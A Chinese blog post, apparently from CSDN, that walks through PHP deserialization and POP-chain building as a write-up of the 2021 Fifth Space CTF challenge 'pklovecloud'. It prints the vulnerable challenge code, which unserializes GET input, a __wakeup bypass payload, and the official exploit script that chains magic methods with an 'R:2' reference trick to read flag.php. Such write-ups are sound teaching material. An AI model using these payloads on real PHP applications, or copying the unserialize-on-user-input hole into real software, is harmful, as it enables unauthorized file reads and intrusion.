PHP反序列化&POP链的构造——2021第五空间CTF pklovecloud

最新推荐文章于 2024-01-04 10:45:54 发布
最新推荐文章于 2024-01-04 10:45:54 发布
阅读量2.6k 收藏 12
点赞数 6
分类专栏: CTF Web安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927266/article/details/120380343
版权

0x00 前言

网上关与PHP反序列化&POP链构造的文章有很多,笔者在这里简要讲解一下其相关知识。从一道题当中学习、扩展、温习相关知识会使学习事半功倍。

0x01 序列化和反序列化

为方便存储和传输对象,将对象转化为字符串的操作叫做序列化( serialize() ),将所转化的字符串恢复成对象的过程叫做反序列化( unserialize() )。

举个栗子:

<?php
Class test{
    public $a= '1';
    public $bb= 2;
    public $ccc= True;
}

$r= new test();
echo(serialize($r));
# O:4:"test":3:{s:1:"a";s:1:"1";s:2:"bb";i:2;s:3:"ccc";b:1;}

$array_t= array("a"=>"1","bb"=>"2","ccc"=>"3");
echo(serialize($array_t));
# a:3:{s:1:"a";s:1:"1";s:2:"bb";s:1:"2";s:3:"ccc";s:1:"3";}

在这里插入图片描述
在这里插入图片描述
a - array
b - boolean
d - double
i - integer
o - common object
r - reference
s - string
C - custom object
O - class
N - null
R - pointer reference
U - unicode string

0x02 PHP魔术方法

方法名调用条件
__construct()在创建对象时候初始化对象,一般用于对变量赋初值。创建一个新的类时,自动调用该方法
__destruct()和构造函数相反,当对象所在函数调用完毕后执行.即当一个类被销毁时自动调用该方法
__toString()当对象被当做一个字符串使用时调用
__sleep()当调用serialize()函数时,PHP 将试图在序列动作之前调用该对象的成员函数 __sleep()。这就允许对象在被序列化之前做任何清除操作
__wakeup()反序列化恢复对象之前调用该方法。当使用 unserialize() 恢复对象时, 将调用 __wakeup() 成员函数
__invoke()把一个实例对象当作函数使用时被调用
__call()调用不可访问或不存在的方法时被调用
__callStatic()调用不可访问或不存在的静态方法时自动调用
__get()在调用私有属性的时候会自动执行
__isset()在不可访问的属性上调用 isset() 或 empty() 时触发
__set()当给不可访问或不存在属性赋值时被调用
__unset()在不可访问的属性上使用 unset() 时触发
__set_state()当调用 var_export() 导出类时,此静态方法被调用。用 __set_state() 的返回值做为 var_export() 的返回值
__clone()进行对象clone时被调用,用来调整对象的克隆行为
__debuginfo()当调用 var_dump() 打印对象时被调用(当你不想打印所有属性),适用于PHP5.6版本

0x03 __wakeup() bypass(进阶)

在不想执行 __wakeup() 的时候,可以让序列化结果中类属性的数值大于其真正的数值进行绕过,这个方式适用于PHP < 5.6.25 和 PHP< 7.0.10。

举个栗子:

<?php
Class User{
    public $name="Bob";
    
    function __destruct(){
        echo"nameis Bob </br>";
    }
  
    function __wakeup(){
        echo"exit</br>";
    }
}
@var_dump(unserialize($_POST["u"]));

POST参数 O:4:"User":1:{s:4:"name";s:3:"Bob";}

exit

object(User)[1]
 public 'name' => string 'Bob' (length=3)

nameis Bob

如果在某些情况下不想让 __wakeup() 执行,可以将 “User” 后的 1 改为一个比 1 大的数字。

POST参数 O:4:"User":2:{s:4:"name";s:3:"Bob";}

nameis Bob

booleanfalse

0x04 5space pklovecloud

题目地址:http://122.112.141.64:45852/

题目源码:

<?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

代码审计,显然是序列化与反序列化的利用——pop链的构造。大体分析一下触发流程:

要想读出 flag.php 就要触发 file_get_contents() 函数;要想触发 file_get_contents() 函数就要触发 ace 的 echo_name();寻找 echo_name(),发现 acp 的__toString() 中恰好有这个函数,所以要想触发 ace 的 echo_name() 就要触发 acp 的 __toString() 且使 acp $this->cinder = new ace();acp 实例化时会自动调用 __construct(),所以要想触发 __toString() 就要使 acp $this->cinder=对象,正好与上述分析所需的 $this->cinder = new ace() 相呼应。综上,pop链为:

acp->__construct() => acp->__toString() => ace->echo_name() => file_get_contents(flag.php)。

构造过程中有两个需要特别注意的点,一个是从未出现过的$heat变量,一个是unserialize($this->docker)。如何满足$this->openstack->neutron === $this->openstack->nova是这道题的关键。

我们先来看一下官方wp:

<?php
class acp
{ 
    protected $cinder; 
    public $neutron;
    public $nova;
    function __construct()
    { 
        $this->cinder = new ace();
    }
    function __toString() 
    { 
        if (isset($this->cinder)) 
            return $this->cinder->echo_name(); 
    }
}
class ace
{ 
    public $filename; 
    public $openstack;
    public $docker;
    function __construct()
    { 
        $this->filename = "flag.php";
        $this->docker = 'O:8:"stdClass":2:{s:7:"neutron";s:1:"a";s:4:"nova";R:2;}';
    }
    function echo_name() 
    {
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova) {
            $file = "./{$this->filename}";
            if (file_get_contents($file)) 
            { 
                return file_get_contents($file);
            } 
            else
            {
                return "keystone lost~";
            } 
        }
    }
}

$cls = new acp();
echo urlencode(serialize($cls))."\n";
echo $cls;

其中$this->docker = 'O:8:"stdClass":2:{s:7:"neutron";s:1:"a";s:4:"nova";R:2;}';是这道题的解题关键。R 在反序列化当中相当少见,网上相关的资料也少之甚少。那么 R:2 到底代表的是什么呢?实践是检验真理的唯一标准,如下是我测试分析的代码:

首先测试了一下当两个值都未赋值时是否能通过===

<?php

$a = $heat;
$b = $c;
echo $a.'--';
echo '<br>';
echo count($a);
echo '<br>';

if($a===$b)
	echo 'Data type and value both are same';
else
    echo 'Data type or value are different';

?>

在这里插入图片描述
上文提到 R 代表的是 pointer reference,所以构造个类且序列化验证:

<?php

class Test{
    public $m;     
    public $n;
    public $o;
    private $q;
    protected $p;
    function __construct($n,$o,$p,$q){
        $this->m = $m; 
        $this->n = $n; 
        $this->o = $o; 
        $this->p = $p;
        $this->q = $q;
    }
}

$i0clay = new Test(1,1,'1',true);
$i0clay->m = &$i0clay->n; //声明变量m,引用自变量n
echo (serialize($i0clay));

?>

在这里插入图片描述
注:private、public 类型变量序列化后其变量名会发生变化,详情可自行上网查询。

果然不出所料,但需要注意的是这里 R 所处的位置是被引用的变量 n 而非 m。那么 2 这个数字又代表什么呢?受 R 所处位置的启发,尝试更换 m 为其他变量:

<?php

class Test{
    public $m;     
    public $n;
    public $o;
    private $q;
    protected $p;
    function __construct($m,$n,$p,$q){
        $this->m = $m; 
        $this->n = $n; 
        $this->o = $o; 
        $this->p = $p;
        $this->q = $q;
    }
}

$i0clay = new Test(1,1,'1',true);
$i0clay->o = &$i0clay->n;
echo (serialize($i0clay));

?>

在这里插入图片描述
不难分析出,R 后的数字代表了要引用其他变量的变量所处的位置。当 m 引用 n 时为 R:2,当 o 引用 n 时 为 R:3。但是 m 是第一个变量,为什么会从 2 开始呢? R:1 又代表什么呢?在这里笔者尝试通过反序列化发现其含义,顺便验证一下前面结论的正确性:

<?php

$payload=unserialize('O:8:"stdClass":2:{s:7:"neutron";s:1:"a";s:4:"nova";R:2;}');
var_dump($payload);
echo($payload->nova);
echo '<br>';
echo(count($payload->nova));
echo '<br>';
$payload->neutron = $heat;
echo($payload->neutron.'--');
echo '<br>';
echo(count($payload->neutron.'--'));
echo '<br>';
if($payload->neutron === $payload->nova)
	echo 'Data type and value both are same';
echo '<br>';

?>

在这里插入图片描述

<?php

$payload=unserialize('O:8:"stdClass":2:{s:7:"neutron";s:1:"a";s:4:"nova";R:1;}');
var_dump($payload);
echo($payload->nova);
echo '<br>';
echo(count($payload->nova));
echo '<br>';
$payload->neutron = $heat;
echo($payload->neutron.'--');
echo '<br>';
echo(count($payload->neutron.'--'));
echo '<br>';
if($payload->neutron === $payload->nova)
	echo 'Data type and value both are same';
echo '<br>';

?>

在这里插入图片描述
猜测 R:1 在这里代表的是$payload = &$payload->nova,即要引用其他变量的变量是该类实例化的对象本身。

0x05 总结

在这里插入图片描述

0x06 参考文章

https://www.cnblogs.com/NPFS/p/12768697.html

iO快到碗里来
关注
  • 6
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PHP反序列化构造POP
Lemon's blog
04-03 4552
前言: 最近在刷题的时候发现这个PHP反序列化POP,之前理解的序列化攻击多是在魔术方法中出现一些利用的漏洞,自动调用从而触发漏洞。但如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 直接通过题目来进行学习,这样更容易掌握!!! Ezpop class Modifier { protected $var; ...
[第五空间 2021]pklovecloud slackmoon的WriteUp
m0_61155226的博客
06-05 665
NSSCTF[第五空间 2021]pklovecloud
第五空间PKlovecloud题解
最新发布
m0_74925562的博客
01-04 366
this->filename一眼丁真反序列化打开代码编辑器,我们需要构造pop,来连接入口和出口,题目中我们需要拿flag,可以看到危险函数file_get_contents(),我们可以进行文件读取,我们来研究一下如何读取这里就上面两个魔术方法我们看下这段代码输出一个$logData,当我们传入一个对象时就会触发_tostring(),所以我们一开始传入acp(),可以看到危险函数在函数echo_name里,而_tostring里刚好有这个函数,所以我们给$cinder。
2021-第五空间智能安全大赛-Web-pklovecloud
qq_53863234的博客
11-29 3306
<?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct()
[第五空间 2021]pklovecloud题解
qq_64222098的博客
05-07 187
在acp这个类里面,我们看到了_toString魔法方法,这个方法是当我们把一个对象当作函数调用时会被自动调用。并且_toString方法里还调用了echo_name()这个函数,这个函数恰巧就是我们先前找到的最终获得flag的地方。首先变量heat也是没有被赋值的,如果这时我们让变量nova的值也为空的话不久可以了嘛。这里我们就找到了这个的终点,即我们可以通过这个file_get_contents函数来获得flag。知道了flag的位置了只需要把变量filename的值变一下就成功获得flag了。
php反序列化POP 构造利用
cosmoslin的博客
09-14 2090
POP 构造利用 一、POP简介 1、POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的“gadg
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
CTF(Capture The Flag)竞赛中,编程者经常面临各种挑战,其中“反序列化”是一种常见的安全漏洞利用方式。第九题的标题暗示我们需要理解并利用PHP反序列化机制来解决这个问题。PHP是一种广泛使用的服务器端...
2021CTF工业信息安全技能大赛(杭州站)
08-02
【标题】"2021CTF工业信息安全技能大赛(杭州站)" 描述了一次重要的信息安全竞赛活动,该活动在2021年于杭州举行,聚焦于工业信息安全领域。CTF,全称Capture The Flag,是信息安全领域的常见比赛形式,通常包含解谜...
浅析PHP反序列化中过滤函数使用不当导致的对象注入问题
12-20
在描述中提到的例子中,有两个`password`字段,但第二个并未覆盖第一个,因为反序列化只处理了第一个有效序列。这表明反序列化过程并不检查整个字符串是否完整,只关注其开头的部分。 **过滤函数的影响**: 当对...
适合新手的php反序列化pop构建思路和原理(有例题,无echo调用tostring)
2301_76690905的博客
10-24 621
对于这个pop的执行过程,可以进一步详细解释。首先,让我们逐步追踪反序列化的过程:反序列化开始时,会先对最内层的对象a进行反序列化,即将‘a进行反序列化,即将‘var_1属性赋值为字符串然后,对对象d进行反序列化,它的‘d进行反序列化,它的‘p__get()`函数,返回对象$a的结果。接下来是对象c的反序列化,其中‘c的反序列化,其中‘z__get()__get()`函数,将对象a返回给对象a返回给对象c。最后,对对象b进行反序列化,它的‘b进行反序列化,它的‘q__wakeup()函数。
WEB攻防-PHP反序列化&POP构造&魔术方法流程&漏洞触发条件&属性修改
siu~
11-10 579
1、PHP-反序列化-应用&识别&函数 2、PHP-反序列化-魔术方法&触发规则 3、PHP-反序列化-联合漏洞&POP构造
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 609
[第五空间 2021] wp
2021-7-28 [MRCTF2020]Ezpop 知识点:php反序列化构造pop
m0_51326092的博客
07-28 467
文章目录前言前置知识解题过程总结 前言 简单题但是自己做了挺久的。。,不过途中找到了好像是出题大佬的博客:https://ieki.xyz/ 前置知识 ①伪协议 php://filter/read=convert.base64-encode/resource=index.phpphp的魔术方法 __construct()//创建对象时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文
CTF 反序列化入门例题wp
qq_47168481的博客
10-20 2597
最近有再看反序列化,尝试着学一下比赛中的反序列化: 源码: <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova;
2021第五空间CTF_web_wp
meteox的博客
09-20 2209
web WebFTP 这个开始时有个1.txt直接访问,里面就有包括flag等的各种环境信息,不知道是忘删了还是有师傅导出的、、、 这个程序直接GitHub上可以找到源代码,里面有个php探针,这就可以得到各种信息了 https://github.com/wifeat/WebFTP/blob/master/Readme/mytz.phpphpinfo中可以得到flag http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo pkloveclou
第三届第五空间网络安全大赛 Web复现
Sk1y的博客
09-24 1121
环境还没关,良心比赛方,赶紧趁着复现复现 文章目录pklovecloudPNG图片转换器EasyCleanupyet_another_mysql_injectionWebFTP pklovecloud 是个pop,需要注意的地方是acp类型中的成员cinder是protected属性的,序列化之后会增加三个字符%00*%00(url编码之后) <?php include 'flag.php'; class pkshow { function echo_name()
[第五空间 2021] Web题解
weixin_51804748的博客
01-18 4900
WebFTP 题目是一个网站管理工具WebFTP2011,上网搜索WebFTP,可以在github中找到这个项目,从README中获取初始用户名和密码 使用说明 1、初始账号 超级管理员 admin 密码 admin888 成功登陆后寻找服务器的网站目录,随便翻看有无可疑文件,最后在phpinfo中找到flag EasyCleanup <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GE
[Injection]对MYSQL 5.0服务器以上版本注入
Gabriel的专栏
09-15 757
by ZaraByteHow to do a SQL Injection for MYSQL Server 5.0+1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
ctf php反序列化
06-07
CTF中的PHP反序列化攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击中,攻击者通常会在Cookie、GET或POST参数中注入恶意的序列化数据,然后通过触发漏洞来执行恶意代码或获取敏感信息。为了防止这种攻击,应用程序开发人员需要对输入进行严格的过滤和验证,并且尽可能避免使用反序列化功能。此外,还可以使用专门的安全框架来防止这种攻击,比如PHP的Suhosin扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值